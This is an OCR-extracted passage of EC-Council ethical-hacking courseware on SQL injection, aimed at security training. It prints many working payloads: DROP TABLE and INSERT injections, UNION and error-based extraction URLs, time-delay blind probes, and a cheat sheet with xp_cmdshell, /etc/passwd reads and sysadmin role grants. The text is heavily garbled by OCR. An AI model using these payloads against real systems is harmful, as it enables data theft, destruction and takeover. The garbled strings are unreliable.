( ' jb ‫ ־‬e m a il‫ ' , י‬jb ‫־‬
VA LU ES

' j a s o n ' , ' ja s o n

YL

s p r in g f ie ld ') ; —

SQL Injection Vulnerable Website
S Q L Q u e ry E x e c u t e d
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members
WHERE email = 'blah1; INSERT INTO jb-customers (‫י‬j b - e m a i l j b - p a s s w d 1 j b - l o g i n _ i d ‫י‬jblast name') VALUES ('j a s o n @ s p r i n g f i e l d .c o m ‫י‬h e l l o j a s o n ', 'jason S p r i n g f i e l d 1); — ‫;י‬

Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction Is Strictly Prohibited.

E x a m p l e 4: A d d i n g N e w R e c o r d s
The following example illustrates the process of adding new records to the table:
INSERT INTO ta b le name (colum nl, column2, column3. . . )
VALUES ( v a l u e l , v a lu e 2 , v a lu e 3 . . . )
Sto re_N am e

Sales

Date

Sydney

$250

Aug-06-2012

M elbourne

$200

Aug-07-2012

Queensland

$400

AUg-08-2012

Victoria

$800

Aug-09-2012

TABLE 14.3: Store Table
INSERT INTO table_nam e
VALUES ("A d e la id e ",

Module 14 Page 2016

(" s t o r e name", " s a l e s " , "d a t e ")

"$1000","08/10/2012")


SQL Injection


S to re N am e

Sales

D ate

Sydney

$250

Aug-06-2012

Melbourne

$200

Aug-07-2012

Queensland

$400

AUg-08-2012

Victoria

$800

Aug-09-2012

Adelaide

$1000

Aug-10-2012

TABLE 14.4: Store Table After Adding New Table

http://1UHRVboy.com

H

■ 1g g y R 0 y.com
!'
Fo rg o t P a s s w o r d
Email Address


Your passw ord w ill be sent to your

3

b l a h ' ; INSERT INTO jb - c u s to m e r s ( ' j b - e n a i l ' , ‫ י‬b p a s s w d , ‫ י‬j b ‫ ־‬l o g i n _ i d ' , 1j b ‫ ־‬Ia s t_ n a !B © ' ) VA 1XJES
‫י‬a s o n s p r i n g f l e l d . c o r e 1 , , h o l l o ' , ‫ י‬ja s o n ‫^ י , י‬a so n
s p r in g fie ld ’ ) ; —

(3

1
0


V

SQL Query Executed
SELEC T
W H ERE

jb - e m a ilf
e m a il

la s t n a m e ')

=

jb - p a s s w d ,

'b l a h ';

VA LU ES

jb - lo g in _ id ,

IN S E R T

IN T O

jb - la s t_ n a m e

jb - c u s t o m e r s

FRO M m e m b e rs

( ' j b - e m a i l j b - p a s s w d j b - l o g i n i d j b -

( ' ja s o n @ s p r in g f 1 e ld .c o m ' , * h e l l o ’

ja s o n ' ,

ja s o n

s p n n g f i e l d ') ; — *;

FIGURE 14.8: SQL Injection Attack

Module 14 Page 2017

Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil

SQL Injection


Example 5: Identifying the Table
Name

C EH
BBQ

J

1 1

g g y B o y . c o m

Forgot Password
■
Em ail Address

blah’ AND 1=(SELECT COUNT(*) FROM
mytable); -SQL Injection Vulnerable Website

You will need to guess table names here


SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FR M table W ERE ;jb-email =
O
H
,blah' A D 1=(SELECT COUNT(*) FR M mytable); —■
N
O
;

Copyright © b y

f ij

EG-G*ancil. All


E x a m p l e 5: I d e n t i f y i n g t h e T a b l e N a m e
e so
|

Ju g g y B o y .c o m


I

Email Address

blah' A D 1=(SELECT COUNT(*) FR M
N
O
mytable); —

Your password will be sent to your

A
You w ill n eed to guess tab le n a m es h ere


S Q L Q u e ry E x e c u te d
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM table WHERE jb-email =
'blah' AND !‫( ־‬SELECT COUNT(*) FROM m y t a b l e ) ; —

FIGURE 14.9: Identifying the Table Name

Module 14 Page 2018


SQL Injection


Exam ple 6: D eleting a Table

J

1 1

g g y B o y . c o m



Em ail Address

blah'; DROP TABLE Creditcard; --

J


SELECT jb-email, jb-passwd, jb-login_id, jk‫־‬last_name FROM members
WHERE jb-email = ,blah'; DROP TABLE Creditcard; — ';


* E x a m p l e 6: D e l e t i n g a T a b l e

Attacker Launching SQL I j c i n
neto

blah'; DROP TABLE Creditcard; —
SQL I j c i n Vulnerable Website
neto
S Q L Q u e ry E x e c u te d

SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FRO m bers
M em
W
HERE jb-email = ,blah'; DRO TABLE Creditcard; — ‫; י‬
P
FIGURE 14.10: Deleting Table

Module 14 Page 2019


SQL Injection


M o d u le F lo w

C EH
(•rtifwtf

ttkujl IUU1

Copyright © by EG-GtODCil. All Rights R eserved. Reproduction is Strictly Prohibited.

0

-

0 ‫־‬

M o d u le F lo w
So far, we have discussed various concepts of SQL injection. Now we will discuss how to

test for SQL injection. SQL injection attacks are attacks on web applications that rely on the
databases as their background to handle and produce data. Here attackers modify the web
application and try to inject their own SQL commands into those issued by the d a tab a se .!


^*



SQL Injection Tools


^

Blind SQL Injection

^
v‫— ׳‬

)

Evasion Techniques

Countermeasures


Module 14 Page 2020


SQL Injection


This section focuses on SQL injection attack characteristics and their detection.

Module 14 Page 2021


SQL Injection


S T E P 1: Check if the web

S T E P 6: Detailed error messages
provide a wealth of information to
an attacker in order to execute
SQL injection

application connects to a
Database Server in order to
access some data

S T E P 2: List all input fields,

S T E P 5: The UNION

hidden fields, and post

operator is used to

requests whose values
could be used in crafting a

combine the result-set of
tw o or more SELECT

SQL query

statements

S T E P 4: Try to insert a string

S T E P 3: Attempt to inject

value where a number is

codes into the input fields to

expected in the input field

generate an error

Copyright © by EC-CMICil. All Rights Jte$'ervfei;Reproduction is Strictly Prohibited.

^

The following are the various steps to be followed to identify SQL injections.

Step 1: Check if the web application connects to a Database Server in order to access some
data.
Step 2: List all input fields, hidden fields, and post requests whose values could be used in
crafting a SQL query.
Step 3: Attempt to inject codes into the input fields to generate an error.
Step 4: Try to insert a string value where a number is expected in the input field.
Step 5: The UNION operator is used in SQL injections to join a query to the original query.
Step 6: Detailed error messages provide a wealth of information to an attacker in order to
execute SQL injection.

Module 14 Page 2022


SQL Injection


SQL In jectio n Error M e s s a g e s
Attempt to inject codes into the
input fields to generate an error
a single quote ('), a semicolon
(;), comments (‫ ,)־־‬AND, and OR

[51

CEH

Microsoft OLE DB Provider for ODBC Drivers
error '80040el4'
[Microsoft][ODBC SQL Server Driver][SQL
Server]Unclosed quotation mark before the
character string ‫.יי‬
/shopping/buy.
aspx, line 52

4C4
1■
U

Attacker
Try to insert a string v a lu e
w h e r e a n u m b e r is expected
in th e in p u t field

Microsoft OLE DB Provider for ODBC Drivers
error '80040607' [Microsoft][ODBC SQL
Server Driver][SQL Server]Syntax error
converting the varchar value 'test' to a
column of data type int. /visa/credit.aspx,
line 17

N ote: If applications do n ot provide detailed e rro r messages and re tu rn a sim ple '500 Server E rror1or a custom e rro r page
th e n a tte m p t b lin d in je ctio n techniques
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

SQL Injection Error Messages
The attacker makes use of the database-level error messages disclosed by an
application. This is very useful to build a vulnerability exploit request. There are even chances of
automated exploits based on the different error messages generated by the database server.
These are the examples for the SQL injection attacks based on error messages:
Attempt to inject codes into the input fields to generate an error a single quote ('), a semicolon
(;), comments (-), AND, and OR.
Microsoft OLE DB Provider for ODBC Drivers error '80040el4'
[M icro so ft][O D B C SQL S e r v e r D r iv e r ][S Q L
b e fo re the c h a r a c te r s t r in g ' ' .

S e rv e r]U n c lo s e d q u o ta tio n mark

/shopping/buy. aspx , l i n e 52
Try to insert a string value where a number is expected in the input field:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[M icro so ft][O D B C SQL S e r v e r D r iv e r ][S Q L S e r v e r ] Syntax e r r o r c o n v e rtin g the
v a rc h a r v a lu e ' t e s t ' to a column o f d ata type i n t . / v i s a / c r e d i t . aspx, l i n e 17
Note: If applications do not provide detailed error messages and return a simple '500 Server
Error' or a custom error page, then attempt blind injection techniques.
Module 14 Page 2023


SQL Injection



CEH
Urtiftetf

' or ‫ י‬Character string indicators
‫י‬
—

?Paraml=foo&Param2=bar

/*.‫/*״‬

+

Addition, concatenate (or space in url)

11

(Double pipe) concatenate

%

Wildcard attribute indicator

Useful as nontransactional command

© variable

Multiple-line comment

URL Parameters

PRINT

or # Single-line comment

Local variable

(*®variable

Global variable

w a itfo r d elay
•0 :0 :1 0 ‫׳‬

ttkujl lUckM

Time delay
Displays SQL server
version

V ©Aversion

Copyright © by EG-GtOIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

The following is a list of characters used by the attacker for SQL injection attacks:
Character

Function

, o r"

Character string indicators

- or #
-

Single-line comment

J*

*j

Multiple-line comment

+

Addition, concatenate (or space in url)

II

(Double pipe) concatenate

%

Wildcard attribute indicator

?Paraml=f00&Param2=bar

URL Parameters

PRINT

Useful as non-transactional command

(®variable

Local variable

(®(®variable

Global variable

waitfor delay '0:0:10'

Time delay

(®(®version

Displays SQL server version

Module 14 Page 2024


SQL Injection


Additional M ethods to D etect
SQL Injection
Ex am p le of
Functio n Testing

F u n c tio n T e s tin g

M ethod 1

►

CEH

This testing falls within the scope of black
s

»

M e th o d 3

inputting massive amount of random data
and observing the changes in the output

http:://juggyboy/?param eter=l AND 1=1http:://juggyboy/?param eter=l'-

a

http:://juggyboy/?param eter=l AND 1=2--

0

http:://juggyboy/?param eter=l'/*

0

http:://juggyboy/?param eter=l' AND T = ' l

»

V

http:://juggyboy/?param eter=l"

&

It is an adaptive SQL injection testing
technique used to discover coding errors by

http:://juggyboy/?param eter=l'#

»

F u z z in g T e s tin g

M e th o d 2

http:://juggyboy/?param eter=l'

a

V

or logic

http:://juggyboy/?parameter=123

s

box testing, and as such, should require no
knowledge of the inner design of the code

http:://juggyboy/?param eter=l order by 1000

S ta tic / D y n a m ic T e s tin g
Analysis of the web application source
co11e

#

3

1

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

Additional Methods to Detect SQL Injection
SQL injection can be detected with the help of the following additional methods:

(&

F u n ctio n T estin g
This testing falls within the scope of black box testing, and as such, should require no

knowledge of the inner design of the code or logic.

F u zzin g T estin g
&

Fuzzy testing is a SQL injection testing technique used to discover coding errors by

inputting a massive amount of data to crash the web application.

S tatic /D y n am ic T estin g
Static/dynamic testing is the manual analysis of the web application source code.
Example of Function Testing:
9

http://juggyboy/?parameter=123

a

http://juggyboy/?parameter=r

Module 14 Page 2025

Ethical Hacking and Countermeasures Copyright © by EC-C0linCil

SQL Injection


©

http://juggyboy/?parameter=r#

©

http://juggyboy/?parameter=r‫׳‬

©

http://juggyboy/?parameter=l AND 1=1—

©

http://juggyboy/?parameter=r‫־‬

©

http://juggyboy/?parameter=l AND 1=2--

©

http://juggyboy/?parameter=l'/*

©

http://juggyboy/?parameter=l' AND T = 'l

©

http://juggyboy/?parameter=l order by 1000

Module

14 Page 2026

Ethical Hacking and Countermeasures Copyright © by EC-C0linCil

SQL Injection


SQL Injection Black Box Pen
Testing
Detecting SQL Injection Issues
J

J

Send single quotes as the input data to
catch instances where the user input is
not sanitized
Send double quotes as the input data to
catch instances where the user input is
not sanitized

CEH

Detecting Input Sanitization
Use right square bracket (the ]

<W>

character) as the input data to catch
instances where the user input is used
as part of a SQL identifier without any
input sanitization

lL J-.
Detecting SQL Modification

Detecting Truncation Issues

Send long strings of single quote characters
(or right square brackets or double quotes)

Send long strings of junk data, just as
you would send strings to detect buffer

These max out the return values from
REPLACE and QUOTENAME functions and
might truncate the command variable used
to hold the SQL statement

overruns; this action might throw SQL
errors on the page


SQL Injection Black Box Pen Testing
In black box testing, the pen tester doesn't need to possess any knowledge about the
network or the system to be tested. The first job of the tester is to find out the location and
system infrastructure. The tester tries to identify the vulnerabilities of web applications from
the attacker's perspective. Use special characters, white space, SQL keywords, oversized
requests, etc. to determine the various conditions of the web application. The following are the
various issues related to SQL injection black box penetration testing:
Detecting SQL Injection Issues
Send single quotes as the input data to catch instances where the user input is not sanitized.
Send double quotes as the input data to catch instances where the user is not sanitized.
Detecting Input Sanitization
Use the right square bracket (the ] character) as the input data to catch instances where the
user input is used as part of a SQL identifier without any input sanitization.
Detecting SQL Modification
Send long strings of single quote characters (or right square brackets or double quotes). These
max out the return values from REPLACE and QUOTENAME functions and might truncate the
command variable used to hold the SQL statement.

Module 14 Page 2027


SQL Injection


Detecting Truncation Issues
Send long strings of junk data, just as you would send strings to detect buffer overruns; this
action might throw SQL errors on the page.

Module 14 Page 2028


SQL Injection


|

Testing String

1

Variations
Single code

1‫ ׳‬or T = ' l
value' or 'l'= 2 ‫״‬
1' and T = '2

1 1
1

Testing String

Variations

I

'; drop table

Testing String

CEH

UrtifM

IthKJl lUckM

Variations

admin'--

adm in1
)-

ad m in '#

admin')#

users-

l ‫)־‬o r (‫,־־!־‬l
valu e') o r ('l'= '2

1+1

3-1

1') and ( T « 2 ‫״‬

1' or 'a b '= 'a V b

1') o r ('ab'=’a V b

1' or 'ab'='a' 'b

1') or('a b '= ’a " b

1' or 'ab'='a'| |'b

1-

1

1') or (’ab'='a'| |'b

1 or 1=1-

Variations

';(SQL Statement];--

‫ י‬o r '1'='1'—

');[SQL Statement];#

;(SQL Statement];-

);[SQL Statement];-

;(SQL Statement];#

);[SQL Statement];#

’) or T « ' l ' -

value) or (1=2

');{SQL Statement];-

,;[SQL Statement];!)

1) o r 1=1-

1) o r (1=1

1 or 1=1

valu e or 1=2

Testing String

1( ‫־ ־‬

j

valu e + 0

1 and 1=2

1 or 'ab'= 'a V b '

1) and (1=2

1) or ('ab '= 'a V b '

1 or 'a b '= 'a "b '

1) or ('ab'■'•‘ T
>

l)o r fab'-'a'I !*b'

1 o r ' a b '^ a 'I |'b'

Testing String

Variations

-1 and 1=2-

-1) and 1=2-

’ and '1’='2‫—י‬

') a n d 'IV ? -

!/ *co m m e n t*/

Copyright © by EG-CtUIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

Some of the testing strings with variations used in the database handling commonly
bypass the authentication mechanism. You can use this cheat sheet to test for SQL injection:

F IG U R E 14.11: Testing for SQ L Injection

Module 14 Page 2029


SQL Injection

Testing String


Testing String

Testing String

Testing String

116

or 1=1-

%22+or+isnull%281%2F0%29+%2F*

7**/OR/**/l/**/=
/**/l

11‫־‬
6

" or"a"="a

' group by userid having 1=1-

' or 1 in (select
(®(®version)-

(116)

Admin' OR '

EXECUTE IMMEDIATE ,SEL' 1 'ECT
1
US‫ ־‬ER 1 '
1

' OR 1=1-

' having 1=1-

CRATE USER name IDENTIFIED BY
'passl23'

OR 1=1

' OR 'text' =N'text'

' OR 'l'= 'l

' OR 2 > 1

; OR T = T

' OR 'text' >'t'

%27+—
+

' union select
l,load_f1le('/etc/passwd'),l,l,l;
exec master..xp_cmdshell 'ping
10.10.1.2'-

' union all select
@@version‫״‬
' OR 'unusual' =
,unusual'
' OR 'something' =
,someVthing'
' OR 'something'
like 'some%'

'; EXEC ('SEL' +'ECT
US' +'ER')
+or+isnull%281%2F
0%29+%2F*
%27+OR+%277659
%27%3D%277659
%22+or+isnull%281
%2F0%29+%2F*
' and 1 in (select
var from temp)'; drop table temp

exec sp addsrvrolemember 'name',
'sysadmin'

' union select

Testing String
UNI/**/ON
SEL/**/ECT

' OR 'whatever' in
('whatever')
' OR 2 BETWEEN 1
and 3
' or username like
char(37);

" or 1=1-

Password:*/=l-

GRANT CONNECT TO name; GRANT
RESOURCE TO name;

'o r 1=1/*

' or 1/*

' union select * from users where login
=char(114,lll,lll,116);

exec sp_addlogin
'name', 'password'
@var select < va
S> r
as var into temp
end -


Testing for SQL Injection (Cont’d)
Additional testing strings used to test for SQL injection include:
Testing String

Testing String

116

Testing String

l/ •
•/

■ / * * / O R/* * / l / * * / '

UNI/* */ON
SEL/‫/ ״‬ECr

' group by userid having 1 * 1 -

" or ‫"־־ ״‬a
V

o r 1 in (select '

EXEC (•SEl' ♦• T
EC
US-♦ ER)

version ^
@

(116)

* Admin' OR

‫־‬OR 1 1 ‫-־‬

Testing String

%22+or+fsnuM%281%2F0%29+%2F*

or 1-1-

‫־‬ll6‫־‬

Testing String

having 1 = 1 1

‫ ;־‬EXECUTE IMMEDIATE SEL‫־ 11 ־‬ECT
US* 11 ER*
CRATE USER nam e IDENTIFIED BY
‫־‬p assl2 3 ‫־‬

OR 1 1 ‫־‬

, OR ,t e x t ‫ «־‬N.text‫־‬

'OR ' 1 1 ‫י י‬
‫־‬

' OR 2 < 1

(‫״‬

' union all select
vcrsion > § > § ‫״‬
* = 'OR ,unusual
'unusual,

♦or+isnull%281%2F
0 % 2 9 .% 2 F *

%27+OR+%277659
%27%3D%277659
%22+or+isnull%281

' union select
l,load_fiIe{/etc/pdSS W d,) , l , l , l ;
exec m astei ‫ ״‬xp_andshell ,ping

10.10.1.2‫־‬
-

= 'OR ,som ething '

'OR ,som ething '
'%like 'some

;OR T - T

OR ,text 1 <,*
‫ ׳‬t

K27+-f

union select '

" or 1=1-

Password:*/‫ -־־‬l

GRANT CONNECT TO nam e; GRANT
RESOURCE TO name;

* OR 2 BETWEEN 1
and 3

' or 1-1 /*

or ' 1/*

‫ ־‬union select * fro m users w h e re login
- char( 114,111,111,116);

’ or username like
char ) 37 (;

exec sp_9<klsryrolemem ber ‫־‬n a m e ',
sysadmin'

%2 FO S2 9 + V 2 F*

'so jm e 't'th in g ,
' and 1 in (select
y^r fro m t e m p ) ‘ ; drop tah le te m p

OR ,w h a te ve r' in '
w h a te v e r1(
,
(
exec sp ..addlogin
,n a m e ', 'password'
<®var select ff» « r
as var in to te m p
end —

F IG U R E 14.12: A dditional Testing Strings

Module 14 Page 2030


SQL Injection


M odule Flow

CEH

(•rtifwtf

ttkujl IU U 1

Copyright © by EG-GtODCil. All Rights Reserved. Reproduction is Strictly Prohibited.

M odule Flow
So far, we have discussed various SQL injection concepts and how to test web
applications for SQL injection. Now we will discuss various types of SQL injection. SQL injection
attacks are performed in many different ways by poisoning the SQL query, which is used to
access the database.
(


^


(C, *


SQL Injection Tools


^ )

Evasion Techniques

Blind SQL Injection

^

Countermeasures

y

—


Module 14 Page 2031


SQL Injection


This section gives insight into the different ways to handle SQL injection attacks. Some simple
SQL injection attacks, including blind SQL injection attacks, are explained with the help of
examples.

Module 14 Page 2032


SQL Injection



9

CEH

U N IO N S Q L
In je c tio n

The following are the various types of SQL injection:

SQL In je c tio n
^
SQL injection is an attack in which malicious code is injected through a SQL query
which can read the sensitive data and even can modify (insert/update/delete) the data. SQL
injection is mainly classified into two types:
Blind SQL Injection
W here ever there is web application vulnerability, blind SQL injection can be used either to
access the sensitive data or to destroy the data. The attacker can steal the data by asking a
series of true or false questions through SQL statements.
Simple SQL Injection
A simple SQL injection script builds a SQL query by concatenating hard-coded strings together
with a string entered by the user. Simple SQL injection is again divided into two types:
9

UNION SQL Injection: UNION SQL injection is used when the user uses the UNION
command. The attacker checks for the vulnerability by adding a tick to the end of a
".php? id=" file.

Module 14 Page 2033

Ethical Hacking and Countermeasures Copyright © by EC-COUIICil

SQL Injection

9


Error Based SQL Injection: The attacker makes use of the database-level error messages
disclosed by an application. This is very useful to build a vulnerability exploit request.

Module 14 Page 2034


SQL Injection


Simple SQL Injection Attack

CEH

System Stored Procedure
Attackers exploit databases' stored
procedures to perpetrate their attacks

Union Query
"UNION SELECT" statement returns
;tatement
the union of the intended dataset
with the target dataset ■
1e target dataset

End of Line Comment

#

^

After injecting code into a
particular field, legitimate

W & )

I

V

^

code that follows is nullified
through usage of end of line
comments

SELECT Name, Phone, Address
FROM Users WHERE Id=l UNION
ERE
ALL SELECT

ker ,1,1
creditCardNumber,1,1 FROM
CreditCardTable

Tautology

/

f

L

1 JU J

g
j
SELECT * FROM u s e r WHERE name
'x' AND userid IS NULL; —

Injecting statements that are
always true so that queries always
return results upon evaluation of a

Kc o ...

W HERE condition

data types, names of tables, etc.

SELECT * FROM users WHERE name
= '' OR '1'
='1';

Simple SQL Injection Attacks
A simple SQL injection script builds an SQL query by concatenating hard-coded strings
together with a string entered by the user. The following are the various elements associated
with simple SQL injection attacks:
9

System Stored Procedure: Attackers exploit databases' stored procedures to perpetrate
their attacks.

a

End of Line Comment: After injecting code into a particular field, legitimate code that
follows is nullified through the use of end of line comments.
SELECT * FROM u se r WHERE name = 'x ' AND u s e r id I S NULL; —

©

Illegal/Logically Incorrect Query:

An attacker may gain

knowledge

by injecting

illegal/logically incorrect requests such as injectable parameters, data types, names of
tables, etc.
Q

Tautology: Injecting statements that are always true so that queries always return
results upon evaluation of a W H ERE condition.
SELECT * FROM u se rs WHERE name =

Module 14 Page 2035

or

‫ י‬l ‫ ׳= ׳‬l


SQL Injection


Union Query: ‫״‬UNION SELECT" statement returns the union of the intended dataset
with the target dataset SELECT Name, Phone, Address FROM Users W HERE ld=l UNION
ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable.

Module 14 Page 2036


SQL Injection


U nion SQL In jectio n E x a m p le

Union SQL Injection ‫ ־‬Extract

Union SQL Injection - Extract

Database Name

Database Tables

http://juggyboy.com/page.
aspx?id=l
UNION SELECT ALL 1,DB_NAME,3,4—
[D B_N AM E]

http://juggyboy.com/page.aspx?id=l
UNION SELECT ALL 1,name,3,4 from
sysobjects where xtype=char(85)--

Returnedfrom theserver

[EMPLOYEE_TABLE]

Returnedfromtheserver

Union SQL Injection ‫ ־‬Extract Table

Union SQL Injection - Extract 1st

Column Names

Field Data

http://juggyboy.
com/page.aspx?id=l
UNION SELECT ALL 1 ,column_name,3,4 from
DB_NAME.
information_schema.columns
where table_name ='EMPLOYEE_TABLE'—

h t t p :/ / j u g g y b o y .c o m / p a g e .aspx?id=l
UNION SELECT ALL 1,COLUMN-NAME1,3,4 from EMPLOYEE_NAME —

[EM PLOYEE_NAME]

[FIELD 1 VALUE]

Returnedfrom theserver


Union SQL Injection Example
UNION SQL injection is used when the user uses the UNION command. The user
checks for the vulnerability by adding a tick to the end of a ".php? id=" file. If it comes back with
a MySQL error, the site is most likely vulnerable to UNION SQL injection. They proceed to use
ORDER BY to find the columns, and at the end, they use the UNION ALL SELECT command.
Extract Database Name
This is the example of union SQL injection in which an attacker tries to extract a database name,
h t t p :/ / ju gg yb oy. com/page. asp x ?id = l UNION SELECT ALL 1 ,DB_NAME,3,4-[DB_NAME] Returned from the server
Extract Database Tables
This is the example of union SQL injection that an attacker uses to rxtract database tables.
h t t p :/ / ju gg yb oy. com/page. asp x ?id = l
s y s o b je c ts where x typ e= ch ar(85)--

UNION

SELECT

ALL

1 ,name,3,4

from

[EMPLOYEE_TABLE] Returned from the server.
Extract Table Column Names
This is the example of union SQL injection that an attacker uses to extract table column names.

Module 14 Page 2037


SQL Injection


h t t p :/ / ju gg yb oy. com/page. asp x ?id = l UNION SELECT ALL 1, column name, 3, 4 from
DB_NAME. in fo rm a tio n _ schema. Columns where t a b le _ name = 'EMPLOYEE_TABLE'-[EMPLOYEE_NAM E]
Extract 1st Field Data
This is the example of union SQL injection that an attacker uses to extract field data.
h t t p : //ju g g yb o y. com/page. asp x ?id = l UNION
from EMPLOYEE_NAME --

SELECT

ALL

1,

COLUMN-NAME-1,

3,

4

[FIELD 1 VALUE] Returned from the server

Module 14 Page 2038


SQL Injection


SQL Injection Error Based
Extra ct Database Name
w http://juggyboy.com/page.aspx?id=
1 or l=convert(int,(DB_NAME))—
a

Syntax error converting the nvarchar value 1
[DB
NAME]' to a column of data type int.

CEH

tilled IUkJ M M
m*

Extra ct 1st Database Table
t http://juggyboy.com/page.aspx?id=l
t
or l=convert(int,(select top 1 name
from sysobjects where
xtype=char (8 5 )))—
‫ ט‬Syntax error converting the nvarchar value
,[TABLE NAME 1]' to a column of data type int.

Extra ct 1st Table Colum n Name
t http://juggyboy.com/page.aspx?id=l or
t
l=convert(int, (select top 1
column_name from
DBNAME.information_schema.columns
where table_name='
TABLE-NAME-1'))—
»

Extra ct 1st Field of 1st Row (Data)
» http://juggyboy.com/page.aspx?id=l
or l=convert(int, (select top 1
COLUMN-NAME-1 from TABLE-NAME-1))w Syntax error converting the nvarchar value
'[FIELD 1 VALUE]' to a column of data type int.

Syntax error converting the nvarchar value
,[COLUMN NAME 1]' to a column of data
type int.

Copyright © by IG-GOHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

SQL Injection Error Based
The attacker makes use of the database-level error messages disclosed by an
application. This is very useful to build a vulnerability exploit request. There are even
chances of automated exploits based on the different error messages generated by the
database server.
Extract Database Name
The following is the code to extract database name through SQL injection error-based method:
h t t p :/ / ju g g yb oy. com/page. asp x ?id = l o r l= c o n v e r t ( in t , (DB_NAME)) —
Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.
Extract 1st Table Column Name
The following is the code to extract the first table column name through the SQL injection errorbased method:
h t t p :/ / ju g g yb oy. com/page. asp x ?id = l o r l= c o n v e r t ( in t ,
( s e le c t
column_name
from
DBNAME. in fo rm atio n _sch em a. columns
table_nam e=1
TABLE-NAME-1' ) ) Syntax error converting the nvarchar value

top 1
where

'[COLUMN NAME 1]' to a column of data type int.

Extract 1st Database Table

Module 14 Page 2039


SQL Injection


The following is the code to extract the first database table through the SQL injection errorbased method:
h t t p :/ / ju g g yb oy. com/page. asp x ?id = l o r l= c o n v e r t ( in t ,
from s y s o b je c ts where x typ e= ch ar( 8 5 ) ) ) —

( s e le c t top 1 name

Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.
Extract 1st Field Of 1st Row (Data)
The following is the code to extract the first field of the first row (data) through the SQL
injection error-based method:
h t t p :/ / ju g g yb oy. com/page. asp x ?id = l
COLUMN-NAME -1 from TABLE-NAME-1) ) —
Syntax error converting the nvarchar value

Module 14 Page 2040

or

l= c o n v e r t ( in t ,

( s e le c t

top

1

'[FIELD 1 VALUE]' to a column of data type int.


SQL Injection


M odule Flow

CEH

U rtifM

IthKJi lUch•(

Copyright © by EG-GtODCil. All Rights Reserved. Reproduction is Strictly Prohibited.

M odule Flow
Previously we discussed various types of SQL injection attacks. Now, we will discuss
each type of SQL injection attack in detail. Let us begin with the blind SQL injection attack. Blind
SQL injection is a method that is implemented by the attacker when any server responds with
any error message stating that the syntax is incorrect.
(v W


^

1*
0


SQL Injection Tools

')


(^q—1j Blind SQL Injection
-


^—

Evasion Techniques

Countermeasures

V‫- ׳‬


Module 14 Page 2041


SQL Injection


This section introduces and gives a detailed explanation of blind SQL injection attacks.

Module 14 Page 2042


SQL Injection


W hat I s B lin d SQL In je c tio n ?

CEH

Copyright © by EC-ClllCil. All Rights Reserved. Reproduction Is Strictly Prohibited.

What Is Blind SQL Injection?
Blind SQL injection is used when a web application is vulnerable to SQL injection. In
many aspects, SQL injection and blind injection are same, but there are slight differences. SQL
injection depends on error messages but blind injections are not dependent on error messages.
W here ever there is web application vulnerability, blind SQL injection can be used to either
access the sensitive data or to destroy the data. Attackers can steal the data by asking a series
of true or false questions through SQL statements. Results of the injection are not visible to the
attacker. This is also more time consuming because every time a new bit is recovered, then a
new statement has to be generated.

Module 14 Page 2043


SQL Injection


No Error Messages Returned
ln this attack, when the attacker tries to perform SQL injection using a query such as: "I
JuggyBoy'; drop table Orders - ", to this statement, the server throws an error message with a
detailed explanation of the error with database drivers and ODBC SQL server details in simple
SQL injection; however, in blind SQL injection, the error message is thrown to just say that
there is an error and the request was unsuccessful without any d e ta ils .(

JuggyBoy' drop table Orders -‫־‬
;

Blind SQL Injection (Attack Successful)

Simple SQL Injection

M ic r o s o f t OLE DB P r o v id e r f o r
ODBC D r iv e r • • r r o r '8 00 4 0*14 ‫־‬
(M ic r o s o f t ) [COBC SQL S e r v e r
D r iv e r J (SQL S e r v e r ](Jn o lo s e d
q u o t a t io n ■ ark b e fo r e th e
c h a ra a te r s trin g * '.
/ s h o p p in g / b u y . a s p x , l i n e 52

F IG U R E 14.13: No Error M essages R eturned

Module 14 Page 2044


SQL Injection


Blind SQL Injection: WAITFOR
DELAY YES or NO Response
; I F EXISTS (SELECT * FROM creditcaxd)
WAITFOR DELAY '0:0 :1 0 *—

Copyright © by EG-GWHICil. All Rights Reserved. Reproduction is Strictly Prohibited.

Blind SQL Injection: W A ITFO R DELAY YES or NO
Response
Step 1:; IF EXISTS(SELECT * FROM creditcard) WAITFOR DELAY '0:0:10'Step 2: Check if database "creditcard" exists or not
Step 3: If No, it displays "W e are unable to process your request. Please try back later".
Step 4: If YES, sleep for 10 seconds. After 10 seconds displays "W e are unable to process your
request. Please try back later".
Since no error messages are returned, use the 'waitfor delay' command to check the SQL
execution status
W A IT FOR DELAY ,time' (Seconds)
This is just like sleep; wait for a specified time. The CPU is a safe way to make a database wait.
WAITFOR DELAY '0 :0 :1 0 '- BENCHMARK() (Minutes)
This command runs on MySQL Server.
BENCHMARK(howmanytimes, do t h is )

Module 14 Page 2045


SQL Injection


©OG0

; IF EXISTS (SELECT * FROM creditcard)
WAITFQR DELAY '0:0:10'—

Oops!
W e are unable to process
your request. Please try
back later.

Since no error messages are returned,
use ,w a i t f o r d e l a y ' command to
check the SQL execution status

Oops!
W e are unable to process
your request. Please try
back later.

FIGURE 14.14: WAITFOR DELAY YES or NO Response

Module 14 Page 2046


SQL Injection


Blind SQL Injection Exploitation (MySQL)

r c1
1
™~ 5

Searching for the first character of the first
table entry
/?id=l+AND+555=if(ord(mid((select+pass+from

Searching for the second character
of the first table entry

users+limit+0 ,1) ,1,1) )= [971,555,777)

/?id=l+AND+555=if(ord(mid((select+pass
from+users+limit+O, 1 ) , 2 , 1))= [9 7 1 5 5 5 ,777)

If the table "users" contains a column
"pass" and the first character of the first
entry in this column is 97 (letter "a"), then

If the table "users" contains a column
"pass" and the second character of
the first entry in this column is 97

DBMS will return TRUE; otherwise, FALSE.

(letter « a » ), then DBMS will return
TRUE; otherwise, FALSE.


Blind SQL Injection ‫ ־‬Exploitation (MySQL)
SQL injection exploitation depends on the language used in SQL. An attacker merges
